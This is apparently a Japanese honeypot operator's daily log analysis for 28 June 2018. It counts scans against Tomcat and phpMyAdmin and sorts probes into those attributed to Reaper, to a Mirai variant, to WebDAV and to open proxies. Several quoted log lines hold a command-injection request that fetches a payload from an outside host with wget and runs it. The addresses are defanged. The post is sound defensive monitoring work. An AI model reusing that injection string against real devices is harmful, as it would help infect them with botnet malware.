WOWHoneypot簡易分析(25日目)
WOWhoneypotの2018/6/28(木)(運用25日目)の簡易分析です。
本日の総アクセス件数はなんと、1520件です。
1210 [2018-06-28 "GET /manager/html
153 [2018-06-28 "POST /command.php
33 [2018-06-28 "GET /
25 [2018-06-28 "HEAD /
2 [2018-06-28 "GET /xampp/phpmyadmin/index.php
2 [2018-06-28 "GET /www/phpMyAdmin/index.php
2 [2018-06-28 "GET /web/phpMyAdmin/index.php
2 [2018-06-28 "GET /typo3/phpmyadmin/index.php
2 [2018-06-28 "GET /tools/phpMyAdmin/index.php
2 [2018-06-28 "GET /pmd/index.php
2 [2018-06-28 "GET /pma-old/index.php
2 [2018-06-28 "GET /pmamy/index.php
2 [2018-06-28 "GET /pmamy2/index.php
2 [2018-06-28 "GET /PMA/index.php
2 [2018-06-28 "GET /pma/index.php
2 [2018-06-28 "GET /PMA2/index.php
2 [2018-06-28 "GET /phpMyAdmin/phpMyAdmin/index.php
2 [2018-06-28 "GET /phpMyAdminold/index.php
2 [2018-06-28 "GET /phpMyAdmin.old/index.php
2 [2018-06-28 "GET /phpmyadmin-old/index.php
2 [2018-06-28 "GET /phpMyAdmin/index.php
2 [2018-06-28 "GET /phpmyadmin/index.php
2 [2018-06-28 "GET /phpMyadmin_bak/index.php
2 [2018-06-28 "GET /phpmyadmin2/index.php
2 [2018-06-28 "GET /phpmyadmin1/index.php
2 [2018-06-28 "GET /phpmyadmin0/index.php
2 [2018-06-28 "GET /phpma/index.php
2 [2018-06-28 "GET /phpadmin/index.php
2 [2018-06-28 "GET /mysql/index.php
2 [2018-06-28 "GET /mysqladmin/index.php
2 [2018-06-28 "GET /mysql-admin/index.php
2 [2018-06-28 "GET /myadmin/index.php
2 [2018-06-28 "GET /myadmin2/index.php
2 [2018-06-28 "GET /index.php
2 [2018-06-28 "GET hxxp://114.215.207[.]183:83/index.php
2 [2018-06-28 "GET /db/index.php
2 [2018-06-28 "GET /dbadmin/index.php
2 [2018-06-28 "GET /claroline/phpMyAdmin/index.php
2 [2018-06-28 "GET /admin/PMA/index.php
2 [2018-06-28 "GET /admin/pma/index.php
2 [2018-06-28 "GET /admin/phpMyAdmin/index.php
2 [2018-06-28 "GET /admin/phpmyadmin/index.php
2 [2018-06-28 "GET /admin/phpmyadmin2/index.php
2 [2018-06-28 "GET /admin/mysql/index.php
2 [2018-06-28 "GET /admin/mysql2/index.php
2 [2018-06-28 "GET /admin/index.php
1 [2018-06-28 "PROPFIND /
1 [2018-06-28 "POST /xx.php
1 [2018-06-28 "POST /xw.php
1 [2018-06-28 "POST /wuwu11.php
1 [2018-06-28 "POST /w.php
1 [2018-06-28 "POST /s.php
1 [2018-06-28 "POST /sheep.php
1 [2018-06-28 "POST /db_session.init.php
1 [2018-06-28 "POST /db.init.php
1 [2018-06-28 "HEAD hxxp://180.163.113[.]82/check_proxy
1 [2018-06-28 "GET /webdav/
1 [2018-06-28 "GET /stssys.htm
1 [2018-06-28 "GET /phpmyadmin
1 [2018-06-28 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
1 [2018-06-28 "GET /cgi/common.cgi
1520件のうち1210件はTomcatの管理ページへのブルートフォース攻撃でした。全て同じIPからです。
これといつものmyPhpAdminを除外すると以下です。
153 [2018-06-28 "POST /command.php
1 [2018-06-28 "GET /cgi/common.cgi
1 [2018-06-28 "GET /stssys.htm1 [2018-06-28 "POST /xx.php
1 [2018-06-28 "POST /xw.php
1 [2018-06-28 "POST /wuwu11.php
1 [2018-06-28 "POST /w.php
1 [2018-06-28 "POST /s.php
1 [2018-06-28 "POST /sheep.php
1 [2018-06-28 "POST /db_session.init.php
1 [2018-06-28 "POST /db.init.php1 [2018-06-28 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
1 [2018-06-28 "GET /webdav/
1 [2018-06-28 "HEAD hxxp://180.163.113[.]82/check_proxy
残っていたログの中で未知のものはありません。
Reaperの感染を狙ったもの。
153 [2018-06-28 "POST /command.php
1 [2018-06-28 "GET /cgi/common.cgi
1 [2018-06-28 "GET /stssys.htm
1 [2018-06-28 "POST /xx.php
1 [2018-06-28 "POST /xw.php
1 [2018-06-28 "POST /wuwu11.php
1 [2018-06-28 "POST /w.php
1 [2018-06-28 "POST /s.php
1 [2018-06-28 "POST /sheep.php
1 [2018-06-28 "POST /db_session.init.php
1 [2018-06-28 "POST /db.init.php
Mirai亜種への感染を狙ったもの
1 [2018-06-28 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
WebDAVの調査
1 [2018-06-28 "GET /webdav/
公開Proxyの調査
1 [2018-06-28 "HEAD hxxp://180.163.113[.]82/check_proxy
本日のハンティングログです。いつものMirai亜種のみです。
1 [2018-06-28 wget hxxp://185.62.190[.]191/r
以上です。